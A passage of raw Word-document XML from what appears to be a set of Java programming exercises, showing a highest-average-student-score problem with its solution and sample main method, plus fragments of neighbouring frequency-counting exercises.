      </w:r>
    </w:p>
    <w:p w14:paraId="367BEB20"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AF80716"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834B661"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0945637C"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maxEleme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Return the element with the highest frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46064105"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8F946C3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1CA0E7"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B556D58"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nput array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1750C85A"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6</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p>
    <w:p w14:paraId="1122D015"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7F956F9F"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Find the element with the maximum occurrence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8173B"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maxOccurrenceEleme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indMaxOccurren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rr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCFFEA3"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126882A4"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int the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6895BC"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Element with the maximum occurrence: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axOccurrenceElement</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D452411" w14:textId="77777777"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7DB28D7" w14:textId="53F0941D" w:rsidR="00F624DB" w:rsidRPr="00CE4B95"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130B8C1E" w14:textId="77777777" w:rsidR="00C83701" w:rsidRPr="00CE4B95" w:rsidRDefault="00C83701" w:rsidP="00C83701">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F91796A" w14:textId="3A6800FF" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="340" w:name="_Toc196307820"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00291AD3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find Highest average score of student</w:t>
      </w:r>
      <w:bookmarkEnd w:id="340"/>
    </w:p>
    <w:p w14:paraId="73A31FF6" w14:textId="77777777" w:rsidR="00080B3A" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00080B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080B3A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>You are given a list of student test scores, where each entry contains a student’s name and their test score as a string array: [student_name, test_score]. Each student may appear multiple times in the list with different scores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEBB8D8" w14:textId="7E68101D" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00080B3A" w:rsidP="00080B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Your task is to write a Java function that calculates the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>highest average score</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> among all students. If a student appears multiple times, their average score should be computed by averaging all of their scores. In case the average is a floating-point number, return the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>floor value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the average (i.e., round down to the nearest integer). If the input list is empty, return 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601EE812" w14:textId="77777777" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20382D29"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88"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>publ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class</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Solution</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26292F46"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publ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stat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bestAverageGrade</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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score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15075ECF"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if</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scores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ull</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score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length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0</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return</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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CCDE86"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C81A4C8"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Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> studentScores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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B47EC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34231C93"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Step 1: Populate the map with scores per student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C0633"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for</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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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entry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score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6256A15A"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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> nam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entry</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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078D6D5"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scor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Integer</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parseIn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entry</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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D67AC1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2FFBA2"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studentScore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putIfAbsen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name</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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D52E34"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studentScores</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ge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name</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add</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score</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A24C9"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7A41E6B8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D076C"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bestAverag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Integer</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MIN_VALUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395292E0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD970A5"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Step 2: Calculate averages and track the max</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C3388B"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for</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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> entry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studentScore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entrySe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335CF4BA"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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> marks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entry</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getValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1025614F"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sum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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0512D018"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for</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scor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mark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3DC5EBA1"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sum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score</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CED6131"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69B68F9B"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averag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in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Math</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floor</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double</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sum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mark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size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB0226D"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bestAverag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Math</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max</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bestAverage</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average</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F255F67"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67C9C7E9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43071926"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> bestAverag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Integer</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MIN_VALU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0</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bestAverage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025CA90A"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37CD9D21"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6611D32E"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Optional main method for testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DF7489"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publ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stat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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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arg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1B868A08"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String</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input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136A1BB7"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lastRenderedPageBreak/>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Bobby"</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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"87"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B607E8"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Charle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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"100"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A339D"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Eric"</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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"64"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617AC9D4"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Charle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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"22"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DA1E8"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40591D98"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System</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ou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println</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bestAverageGrade</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inpu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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Output: 87</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D121AB" w14:textId="77777777"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707E51E5" w14:textId="66BCA4AC" w:rsidR="00D62FD7" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D2CE06" w14:textId="51E70D64" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="341" w:name="_Toc196307821"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00D10C97" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find occurrence of </w:t>
      </w:r>
      <w:r w:rsidR="00C076A8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00D10C97" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ord in String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="341"/>
    </w:p>
    <w:p w14:paraId="4036B4E4" w14:textId="045230C8" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="005F1B45">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00E8168E" w:rsidRPr="00CE4B95">
        <w:rPr>
